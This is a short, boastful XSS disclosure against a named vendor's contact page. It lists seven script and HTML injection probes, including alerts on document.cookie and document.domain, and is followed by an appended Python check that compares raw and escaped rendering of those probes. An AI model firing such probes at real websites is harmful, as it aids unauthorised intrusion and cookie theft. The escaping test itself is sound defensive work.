
XSS Bug in OpenGear Server Website



0x0*] Advisory 
==============

Web Penetrated By:- Aditya@xxxxxxxxxxx
=======================================
Hit                     :- Site Manipulation.
====
Vulnerability   :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus   :- Windows IE 6.0
==============

Injections      :-
==========         0x01] ' && ""
                   0x02] <script>Javascript:alert("Penetrated");</script>
                   0x03] <p>Penetrated</p>
                   0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
                   0x05] '';!--"<CSS_Check>=&{()}
                   0x06] '<script>javascript:alert(document.cookie);</script>
                   0x07]  '<script>javascript:alert(document.domain);</script>
                          

                                Result:-Opengear.com with alert injection.
                        
                   0x01] document.domain Injection Yields --> Opengear.com
                   0x02] document.cookie Injection Yields --> Empty string
                   0x03] Remote Linking Is Possible <a href=""></a> Working.
                   0x04] The OutBound Attack Is Also Definitive.

Site            :- http://www.Opengear.com
=======    
Vulnerable Link:
================    http://www.opengear.com/cm4000_nwcontact.html


Explanation     :- 
=============
                
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.

                =========================================================
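
A regression check for the fix, added here as an example and not part of the original advisory: it passes the seven probe strings listed above through a raw template and an output-encoded one, then counts the tags an HTML parser sees. The templates `render_unsafe` and `render_safe`, and the assumption that the contact page echoes a form field into HTML, are hypothetical; the advisory does not name the affected parameter.

```python
import html
from html.parser import HTMLParser

# Probe strings 0x01-0x07, copied from the advisory's "Injections" list.
PROBES = [
    "' && \"\"",
    '<script>Javascript:alert("Penetrated");</script>',
    "<p>Penetrated</p>",
    '<a href ="www.zeroknock.cjb.net">ZeroKnock</a>',
    "'';!--\"<CSS_Check>=&{()}",
    "'<script>javascript:alert(document.cookie);</script>",
    "'<script>javascript:alert(document.domain);</script>",
]

def render_unsafe(value):
    # Hypothetical vulnerable template: user input concatenated as-is.
    return '<div class="echo">Thanks, ' + value + "</div>"

def render_safe(value):
    # Encode & < > " ' so the input stays text in element and attribute contexts.
    return '<div class="echo">Thanks, ' + html.escape(value, quote=True) + "</div>"

class Collector(HTMLParser):
    """Records every start tag and all text the parser sees."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
    def handle_data(self, data):
        self.text.append(data)

def parse(page):
    collector = Collector()
    collector.feed(page)
    collector.close()
    return collector.tags, "".join(collector.text)

def injected_tags(render, probe):
    # The first tag is the template's own <div>; anything after it came from input.
    return parse(render(probe))[0][1:]

def report(render):
    # Map each probe to the tags it managed to create in the rendered page.
    return {probe: injected_tags(render, probe) for probe in PROBES}

if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        for probe, tags in report(fn).items():
            print(f"{name:6} {tags!s:16} {probe}")
```
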